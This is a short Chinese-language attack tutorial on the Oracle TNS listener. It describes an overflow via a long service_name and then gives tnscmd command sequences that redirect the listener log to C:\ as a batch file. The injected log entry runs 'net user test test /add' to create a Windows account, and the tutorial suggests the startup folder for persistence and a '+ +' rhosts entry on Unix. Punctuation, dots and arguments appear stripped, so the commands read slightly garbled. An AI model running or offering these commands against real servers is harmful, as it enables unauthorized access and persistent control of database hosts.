先根据版本的不同TNS listener可能较易受到多种类型的缓沖区溢出攻击这些攻击可以在不提供用户ID和口令的情况下被利用例如在oracle i中当客户机请求某个过长的service_name时很容易受到溢出攻击当listener为日志构建错误消息之后service_name的值会被复制到某于栈结构的缓沖区内从而引起溢出—覆盖保存值将返回栈中的地址这种做法可以使攻击者获得控制权事实上TNS listener曾经有过多次溢出和格式化字符串的漏洞
其次另一类攻击和日志文件有关只有当未给listener设置口令的时候攻击才会有效假设某个listener没有设置口令攻击方法如下
[Copy to clipboard]CODE:tnscmd h p rawcmd (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_directory)(ARGUMENTS=)(SERVICE=LISTENER)(VERSION=)(VALUE=c:\\)))
将日志目录设置到C盘
[Copy to clipboard]CODE:tnscmd h p rawcmd (DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=)(SERVICE=LISTENER)(VERSION=)(VALUE=testbat)))
将日志文件设置为testbat
[Copy to clipboard]CODE:tnscmd h rawcmd (CONNECT_DATA=(( ||dir >testtxt||net user test test /add))
该命令把dir >testtxtnet user test test /add命令写入c:\testbat文件由于双竖线的作用(第一条命令执行失败后WINDOWS命令解释器执行后面的命令)把错误的信息注释掉从而可以执行我们提交的命令
通过设置日志文件到不同的目录例如WINDOWS的启动目录当服务器重启将执行恶意用户提交的特定代码从而对系统造成威胁
运行于UNIX系统上的oracle也会受到同样的威胁其中一种方法就是将++回送给rhost文件当系统运行时使用r*services命令